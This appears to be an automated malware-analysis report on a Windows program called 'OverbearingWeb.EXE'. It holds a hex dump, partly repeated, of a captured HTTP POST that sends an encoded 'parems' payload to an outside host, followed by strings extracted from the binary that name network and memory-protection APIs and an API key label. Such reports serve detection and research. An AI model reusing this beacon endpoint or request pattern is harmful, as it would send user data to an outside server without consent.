0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8


Strings
.7o.
..
w
d.
..
.f
.7o.
..
w
d.
..
.f

080404B0
1, 0, 0, 1
 (C) 2014
CompanyName
FileDescription
FileVersion
InternalName
LegalCopyright
LegalTrademarks
OriginalFilename
OverbearingWeb
OverbearingWeb 
OverbearingWeb.EXE
OverbearingWeb Microsoft 
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
 !"#$%
,(####$ 
&'()*+,-./
0@(;ax7hwa
$0O,y7e
.1688{
>1?FX_6
??1tF_iV
=20084.2
299.cc/Client
2fred5
2l0-4M
2=M\ns
@2 W`H2
3002#flow_apikey_xh
.32o/dZ{[
#+3;Ci
3'Keep
 $3/,O.
4!+0a.
4d%028l
@4DBZEW
4f`ZTN
4JD>82
4Mc|w{
4#S2<8t`
4sOv&[Y.v
;5YNqrs}
60*8lK
<6\@{0.Mi
&62,QN7
6< 4LPs
6inx Q
;70n$##"
 $*7B/
	7C<eu
-7Fb,<y
7P-%+o
>82 DC
83t[1g
_}8 \8
89+/D>?
8<FFFF@DHLFFFFPTX\FFFF`dhlFFFFptx|FFFF
8 Mark A
8>qg(= 
>8R# D	u
9hs+eA
9&koHUT
;%`+{#9O;
A_0[oku
+A+%3K"
a/4.0 (
ABCDEFGHIJKLMNO
ABF:QT@v
ADVAPI32.dll
\aE[blG$  
at[ekUw
aT$]V( 
A@UQz8
AUT5ul4n
[A-Za-z]{3}),
AZSle~i
=BB=,EYm
BFUa.X
b-fYm-G
B$`'GP
BH8z^p:
%B/!M*!	
B>\s\d{2}-
 $B"T$kY
bugSg(r
 caSr./B
C__CxxFzHan
cdefghijklmnopqrstuvwxyz01234567
Cg@b	g 
c":"get
[ cKa-
[]code
 Copyright
coU	Ft
ctyZW@i
%CXb)c
cy.t? 
&\}Cz4w
D348/8r%
dCLR 2T
d":d6_h
DDDDD@
DDDDDDD
DDDDDDDDD
DDDDDDDDDDD
DDDDDDDDDDDDD
DDLDLD
DDLLDDDL
D""fT**~;
d+j!5c 
d[o95`
do{-nn/Yt(
 DOS m
DPQRDP
Dxt,vk:*t
Ed|"qq
Embede
e_rand[;{
E,\ShtK
eVC&9g
ExitProcess
	-f3F2
F@:44M
F|dPOWVS
f[j-3*/
fnn_wP
fqpA-b)x
g;:;<=
G1Las5%
\G`AMp
GC8 H`
GetProcAddress
GMT)%l
GrraSplT@rh:+
gsc|w{
h$6](]
?@H7J_
HB<60=
}HC4Q|
H)d.L=
hg'E< 
-HH2:G
Hi:xUB
hOb\VP4M
HPSQbt
HrCg@b	g 
hrome.exettp://"..6
$_hV=>N
hypyxy
	i~3.5.390V
iAal{v
 iciNWq
/ig	.qq-+]
?iIf+9
i m`wz
 inflate 1.
/InfoP
InternetOpenA
iRpAh ?
IsIconic
i~sP]Ji
i]s.ZR
i\VPJD
IvQRP@
jd>\>|0
j,e^4M
.jM5"l
jN#CjFo
J%%o\..r8
J=q;h@
jWmX@8
Kb`Z*/z
KERNEL
KERNEL32.DLL
KPYfoti
kw3 QR&#<9lhuOp
kX6sW_,70
l4kedD"7m
l*Cr	c
LDDDDDDD
-+ldn'
L&&jl66Z~??A
LLDDLD
~l\L<f
LoadLibraryA
lP~4*P 
LPq,1Ev
lQQ/(.-
(&lscGC/
.M3-x|
|M_6G'KU
MAGEHLPA
Md7'Jx
MFC42.DLL
MFC42.DLLn
; MSIE 
MSVCP60.dll
MSVCRT
MSVCRT.dll
'Mylait
mZ<OG=
N4h(eP
`n]|9;
NBO r+[i
n|Od&)\
nQOmR[
nsxIB_i
 NT 6.1
Ocgi-b
OhopID
O`JH.y
O*+nA<
O.no\B/wS]
ool2r)
oryHC^i
owcan` ru
_o`x}qdO!
oxuV[Li
parems=
#p$B1 
\\.\Phys[{
pkb]TO
Po#MLk
ppend%8h
_<PPTbq\M?2
PT./tF*-
P;vl!'6L
 ?P,(x=
pXEff$$
PyX`yg
QD_TG^d+
QERy#8
Qkkbal
QTk fp
QZ^&\key
 r+6#"
R[[\cA
REFNAVdSTYK
RE'URLK
r!'hhfK
RmhtT<
RODu~ci
R+PB~,
rPyifmk
s4V\Cw
sb11S*
SHELL32.dll
SHGetSpecialFolderPathA
Sk%+	A
/-?SLCC
 S+^Qt
SS(605
Sta]pI
STVXYZab
sWV14LR
T4k. T
t&B\X`F(
tFqi}W
tg8,p[f
!This program cannot be run in DOS mode.
>ThwZ(
;t-+oz
TRP^jx
tU,v3;
?twG78843e'
-Typeq
&[?|@u
++)(U7
@@UAE@XZ/
uFVB"2
UGhQ~5
u+K;cKF#
UmLG-;
U!M_PL
 unzip 0
Updat!
 -URL{
USER32.dll
userid
V2SION
vG|,xU
V.,:I[/
VirtualProtect
vma>ar
!/.vv;'4FUq{}kJ#B
VzZi`;>
,wBu$79V+
WININET.dll
WkomRz
WORD}&s
WQBEIPBDII@\6*
};WSBl
%!X4mW
|xFFFFtplhFFFFd`\XFFFFTPLHFFFFD@<8FFFF40,(y>GF$
X/@G{f
X}K8D,
~Xkksv
x@""kv
?_Xlen@std@@YAXXZ
XPTPSW
XPVSS#
{-?[Xt
Y6R'v^
y{lL~H;3Hv
Y%{nXC<;K
yS_I1yp.
!/y%`/x
y~x3+h
yyT:f"s
Z{1utL8
zahW^Ei
Ze2Zh@
@^(zLhW3
ztnhbk
z_{YMUo